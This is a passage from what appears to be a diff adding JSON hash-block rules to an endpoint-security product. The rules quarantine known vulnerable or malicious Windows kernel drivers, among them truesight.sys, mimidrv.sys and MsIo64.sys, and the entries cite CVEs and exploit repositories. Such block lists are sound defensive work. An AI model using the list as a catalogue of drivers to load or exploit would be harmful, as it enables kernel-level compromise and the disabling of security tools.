+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ea1c3fd-b768-5c58-af3d-397e1a10095b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490332Z",
+ "creation_date": "2026-03-23T11:45:31.490334Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490340Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42ba46e7106efb977fc9c2a4a9859d2fb67168f19608481e93209c5a3516c7ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0eb022b3-d37e-5557-8772-fef9681d0723",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975202Z",
+ "creation_date": "2026-03-23T11:45:29.975204Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975209Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd688dc0e5b7b6c5e506c153d4c52ab7023b27a438423ccf77bf61be4d1971b6",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0eb22133-3a01-5ee5-ae44-dce7a2c3aa73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622776Z",
+ "creation_date": "2026-03-23T11:45:29.622778Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622783Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "21a8aa12aa944658f05694243e4d7b9ba07ea24447b539d40977e9b7fa19fed1",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0eb7996f-0af7-509c-b6d1-458eb0fb977a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493257Z",
+ "creation_date": "2026-03-23T11:45:31.493259Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493265Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31124ab8f3da114ab87b46dbb42758254a69c41d24a4a99416eb73295b0022a1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ebbc04a-ded6-5fa7-8480-5d93c4a24fc7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612422Z",
+ "creation_date": "2026-03-23T11:45:29.612424Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c64d4ac416363c7a1aa828929544d1c1d78cf032b39769943b851cfc4c0faafc",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ebc7407-0cb7-5793-abd0-aecc61c5bf3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967938Z",
+ "creation_date": "2026-03-23T11:45:29.967940Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967955Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d31118a2e92377ecb632bd722132c04af4e65e24ff87743796c75eb07cfcd71",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ebf02c3-27cb-59a9-8cdf-d10a2f02c6fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466441Z",
+ "creation_date": "2026-03-23T11:45:30.466444Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466452Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19dfacea1b9f19c0379f89b2424ceb028f2ce59b0db991ba83ae460027584987",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ecc43c5-540c-5e83-b96a-460b260c2dd9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611342Z",
+ "creation_date": "2026-03-23T11:45:29.611344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611349Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2159219e9986ab9e07e00a87fb83835230a2b99174e7f9b94096046c2dace55",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ecc7a9a-6c61-599b-b62d-111887236147",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489751Z",
+ "creation_date": "2026-03-23T11:45:31.489754Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f84bb12accc91d67a916636f3a903ab4d1b5c917b2302c112717d55dd33cc14",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ed18a86-20c4-5dbc-bf69-3f2a68288627",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614963Z",
+ "creation_date": "2026-03-23T11:45:29.614965Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614970Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ed604ba-056f-536d-8813-f1ae7ba2bd39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141166Z",
+ "creation_date": "2026-03-23T11:45:31.141168Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141173Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b942cb3421f66bdc6895200054232f2b22af6995d34a513df6259c30bf1d0d9d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0edd54dd-d2ca-58f2-800c-3f950859b34e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614232Z",
+ "creation_date": "2026-03-23T11:45:29.614234Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614239Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d0962db9dc6879067270134801ad425c1f3e85b0dc39877c02aaa9c54aca14e",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0eeff0d9-0809-5a44-9310-f04f765bd841",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475763Z",
+ "creation_date": "2026-03-23T11:45:31.475767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b2bf79d88646a1a1afbb4677ca1622e3db71f1f06869fa8751ba19c5ce61134",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ef8eb06-9289-5272-b9bb-5c989acd5ba7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142054Z",
+ "creation_date": "2026-03-23T11:45:31.142056Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142062Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "639cfdb6dfe53be18dfc5974089a361c23b0ecfe0ff346bf451098b5c44b2dde",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f038925-9423-53d8-a9de-d7fbf47fc3fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604790Z",
+ "creation_date": "2026-03-23T11:45:29.604792Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3d65e0f04514f60acaa70f934e3e888211301566415822e6326fa930a551ba1",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f0f7f17-bc8d-5ea0-a0ae-ac6f2604d7ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617483Z",
+ "creation_date": "2026-03-23T11:45:29.617485Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c04c274a708c9a7d993e33be3ea9e6119dc29527a767410dbaf93996f87369a",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f1813f7-faf0-5901-9d9e-e7eaf2038f19",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495510Z",
+ "creation_date": "2026-03-23T11:45:31.495512Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495518Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3df8f062d6b16b4615c8d170437a8d0ce8fc2de10b812b35b2c21b6b2f9c6d96",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f1970d6-86f1-5867-a80b-d84588939106",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146294Z",
+ "creation_date": "2026-03-23T11:45:31.146296Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d65b29640c75a2364e22f07cd647c1bd1c441a677d79f3b8a75260b3d2dbecb3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f1aabc3-b617-52dd-99e5-aec4be6abc44",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827497Z",
+ "creation_date": "2026-03-23T11:45:31.827499Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827505Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af80b334ef86d05d652a4eaa6edbf8544283e78752c5c84ec84d13edca228129",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f1e891c-bbf5-5af5-a51b-f2a93b526d20",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479601Z",
+ "creation_date": "2026-03-23T11:45:30.479603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479609Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "548c44566d19ba0975c9a22e7b592fda45bfa8831e56f55c1c3e7241d84dd175",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO64I.SYS) [https://www.loldrivers.io/drivers/080a834f-3e19-4cae-b940-a4ecf901db28/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f210936-fe6d-5ff6-8357-9ac8ecbcaf53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490945Z",
+ "creation_date": "2026-03-23T11:45:31.490957Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490966Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93e6ee9a67a9720669944e22d76019b3b5cd63a4ca99dafc25a446c6136ed322",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f21fe95-0426-517d-893e-112dd119ae07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820969Z",
+ "creation_date": "2026-03-23T11:45:31.820972Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820981Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed8815b30cf785d1748b62d154bcc09075648bea72495e68be0b9b8b342fd0af",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
